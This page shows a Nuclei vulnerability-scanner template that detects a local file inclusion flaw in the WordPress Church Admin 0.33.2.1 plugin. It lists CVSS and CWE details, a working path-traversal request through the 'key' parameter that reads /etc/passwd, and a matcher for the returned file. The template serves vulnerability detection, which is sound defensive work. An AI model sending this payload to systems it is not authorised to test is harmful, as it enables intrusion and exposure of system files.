Skip to content

WordPress Church Admin 0.33.2.1 - Local File Inclusion

ID: church-admin-lfi

Severity: high

Author: 0x_Akoko

Tags: wordpress,wp-plugin,lfi,wpscan

WordPress Church Admin 0.33.2.1 is vulnerable to local file inclusion via the “key” parameter of plugins/church-admin/display/download.php.

id: church-admin-lfi
info:
name: WordPress Church Admin 0.33.2.1 - Local File Inclusion
author: 0x_Akoko
severity: high
description: WordPress Church Admin 0.33.2.1 is vulnerable to local file inclusion via the "key" parameter of plugins/church-admin/display/download.php.
reference:
- https://wpscan.com/vulnerability/8997
- https://id.wordpress.org/plugins/church-admin/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 1
tags: wordpress,wp-plugin,lfi,wpscan
http:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 4a0a00473045022100c1ceec93f15579476933022ffac0a42e0ac21c0e14b7f975cfa93339fdb0493a02205a615e743921ee2b060050d75f41a28fc2361c542e2d1af1d1feb6dc234ab22b:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/church-admin-lfi.yaml"

View on Github